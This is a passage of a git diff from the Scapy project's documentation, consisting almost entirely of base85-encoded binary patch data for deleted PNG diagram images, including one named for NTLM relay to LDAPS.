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 AO8@`> diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png b/doc/scapy/graphics/ntlm/ntlmrelay_ldaps.png deleted file mode 100644 index 34f1b659547d87b7d83d8f94b014bc32e09b20f6..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 53781 zcmb4rbyQqmvt^Lr5*!*!@Zj$5P9VYE-Q7d*;1XPd1PJc#?i$>KYty**bbjA^Z)Vo} z!khVr?$xVrb8elgQ@eKUy5S!brBIOoNUvVKLY0vgS9$dcE(-E~0s#*4_pNtI0OSSA zSw%|pRrxs40pz1sGU6hiJoJuN-F-gwJ@aZibo_4I+w9Ib zdwvujG5m_*Rq~9YtXm{d=t^1`8Z-7YEX7+W#DD+xu?IGCdUEifHlcWOpOo_nQ2xS~ z|NI03LSnGwl4U;SyMQ#L+U;8watmH-BCG<_*~=a)roa80KUZ=W!A1rJ-Q$Kt7xERE zN%Z|{{#*jKZM}G2+!l0whxg?E`k9RYeD2Juv?CzZwtVkAbfFD)vOj$B7Ct0HdxuD} zz%=Y4k8VxYUXSuL@x_eM0E_n;JzIa7lZmxN8S9?K z5Hm#YOtYw80JoN>nTHj2v*l8*&Oh=$AF3c(%P~8>y&3h7^yi4Co~D0iZ4DsY^&QI( 